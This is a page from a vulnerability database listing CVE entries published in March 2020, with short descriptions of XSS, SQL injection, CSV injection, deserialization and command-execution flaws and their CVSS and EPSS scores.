Security Vulnerabilities - CVEs Published In March 2020
ilchCMS 2.1.23 allows XSS via the index.php/partner/index Name parameter.
CVSS Score
6.1
EPSS Score
0.003
Published
2020-03-19
The _dtoa_r function of the newlib libc library, prior to version 3.3.0, performs multiple memory allocations without checking their return value. This could result in NULL pointer dereference.
CVSS Score
6.5
EPSS Score
0.004
Published
2020-03-19
qemu/qemu_driver.c in libvirt before 6.0.0 mishandles the holding of a monitor job during a query to a guest agent, which allows attackers to cause a denial of service (API blockage).
CVSS Score
5.7
EPSS Score
0.002
Published
2020-03-19
arxes-tolina 3.0.0 allows User Enumeration.
CVSS Score
4.3
EPSS Score
0.003
Published
2020-03-18
A CSV injection in arxes-tolina 3.0.0 allows malicious users to gain remote control of other computers. By entering formula code in the following columns: Kundennummer, Firma, Street, PLZ, Ort, Zahlziel, and Bemerkung, an attacker can create a user with a name that contains malicious code. Other users might download this data as a CSV file and corrupt their PC by opening it in a tool such as Microsoft Excel. The attacker could gain remote access to the user's PC.
CVSS Score
9.6
EPSS Score
0.004
Published
2020-03-18
LogicalDoc before 8.3.3 allows SQL Injection. LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. Some of them are not properly sanitized which could allow an authenticated attacker to perform arbitrary queries to the database.
CVSS Score
6.5
EPSS Score
0.004
Published
2020-03-18
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
CVSS Score
8.8
EPSS Score
0.401
Published
2020-03-18
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).
CVSS Score
8.8
EPSS Score
0.205
Published
2020-03-18
PerlSpeak through 2.01 allows attackers to execute arbitrary OS commands, as demonstrated by use of system and 2-argument open.
CVSS Score
9.8
EPSS Score
0.005
Published
2020-03-18
LogicalDoc before 8.3.3 could allow an attacker to upload arbitrary files, leading to command execution or retrieval of data from the database. LogicalDoc provides a functionality to add documents. Those documents could then be used for multiple tasks, such as version control, shared among users, applying tags, etc. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file in a restricted folder. This would lead to the executions of malicious commands with root privileges.
CVSS Score
9.8
EPSS Score
0.015
Published
2020-03-18